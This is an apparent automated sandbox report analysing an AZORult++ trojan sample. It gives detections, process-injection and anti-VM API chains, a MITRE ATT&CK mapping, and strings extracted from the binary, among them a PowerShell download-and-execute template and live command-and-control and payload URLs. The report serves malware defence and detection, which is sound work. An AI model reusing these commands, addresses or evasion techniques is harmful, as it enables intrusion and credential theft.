Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
Analysis ID:	1426755
MD5:	69b4504419872fee9bc3bc996b88eb4b
SHA1:	f87cd6cc91070bb3331fe6c6e25ac84b840f0c50
SHA256:	0a06c8a177765ec2e723da7b9d406eb68c43541a6740ffa395a7297ed94e0d73
Tags:	exe
Infos:

Detection

AZORult++

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected AZORult++ Trojan

Multi AV Scanner detection for submitted file

Contain functionality to detect virtual machines

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Found evasive API chain (may stop execution after checking locale)

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe (PID: 3648 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe" MD5: 69B4504419872FEE9BC3BC996B88EB4B)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	ReversingLabs: Detection: 83%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Virustotal: Detection: 80%			Perma Link

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8306 Sleep,Sleep,Sleep,InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,	0_2_005A8306
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8330 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,	0_2_005A8330
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8F20 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	0_2_005A8F20

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB8ACD FindFirstFileExW,		0_2_00FB8ACD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,		0_2_005A8610

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A6690 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_005A6690

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	String found in binary or memory: http://195.123.217.199/aahs.php
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027937445.000000000069E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.123.217.199/aahs.php%temp%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	String found in binary or memory: https://xpradiotwo.com/wp-content/uploads
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027937445.000000000069E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: https://xpradiotwo.com/wp-content/uploads/c

E-Banking Fraud

Detected AZORult++ Trojan

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A8DC0 EntryPoint,GetUserDefaultLangID,ExitProcess,

0_2_005A8DC0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A5E60 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,		0_2_005A5E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A5AE0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,		0_2_005A5AE0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FBE87D	0_2_00FBE87D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A7850	0_2_005A7850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A7430	0_2_005A7430
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A2490	0_2_005A2490
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A4250	0_2_005A4250
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A4650	0_2_005A4650

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: String function: 00FB4480 appears 33 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: String function: 00FB3040 appears 46 times

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal88.bank.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A6200 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

0_2_005A6200

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A6AC0 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,

0_2_005A6AC0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Command line argument: jhl46745fghb

0_2_00FB2F40

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	ReversingLabs: Detection: 83%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Virustotal: Detection: 80%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: sspicli.dll	Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00FB1300

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe

0_2_005A8610

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_005A8610

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-11872

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-11968

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

File opened / queried: C:\Windows\System32\VBoxService.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

API coverage: 9.6 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB8ACD FindFirstFileExW,		0_2_00FB8ACD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,		0_2_005A8610

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Binary or memory string: Hyper-V
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Binary or memory string: VMWare
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: POST%s\|%s\|VoYGkc5RStart%d\|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://195.123.217.199/aahs.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://xpradiotwo.com/wp-content/uploads/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Binary or memory string: %systemroot%\System32\VBoxTray.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	API call chain: ExitProcess graph end node			graph_0-11972
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	API call chain: ExitProcess graph end node			graph_0-10632

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00FB695B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00FB1300

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB1710 mov ecx, dword ptr fs:[00000030h]	0_2_00FB1710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB75A2 mov eax, dword ptr fs:[00000030h]	0_2_00FB75A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB9763 mov eax, dword ptr fs:[00000030h]	0_2_00FB9763
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A7640 mov eax, dword ptr fs:[00000030h]	0_2_005A7640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A5E60 mov eax, dword ptr fs:[00000030h]	0_2_005A5E60

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FBA845 GetProcessHeap,

0_2_00FBA845

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FB695B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB3D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FB3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FB421C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB43AF SetUnhandledExceptionFilter,	0_2_00FB43AF

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A5AE0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,

0_2_005A5AE0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB44C5 cpuid

0_2_00FB44C5

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB4103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00FB4103

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_005A8610

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	21 Native API	Boot or Logon Initialization Scripts	1 Process Injection	1 Access Token Manipulation	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	112 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	83%	ReversingLabs	Win32.Trojan.Azorult
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	81%	Virustotal		Browse
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	100%	Avira	TR/Kryptik.kpmcp
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://195.123.217.199/aahs.php	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://195.123.217.199/aahs.php	SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	false	0%, Virustotal, Browse	unknown
http://195.123.217.199/aahs.php%temp%	SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027937445.000000000069E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1426755
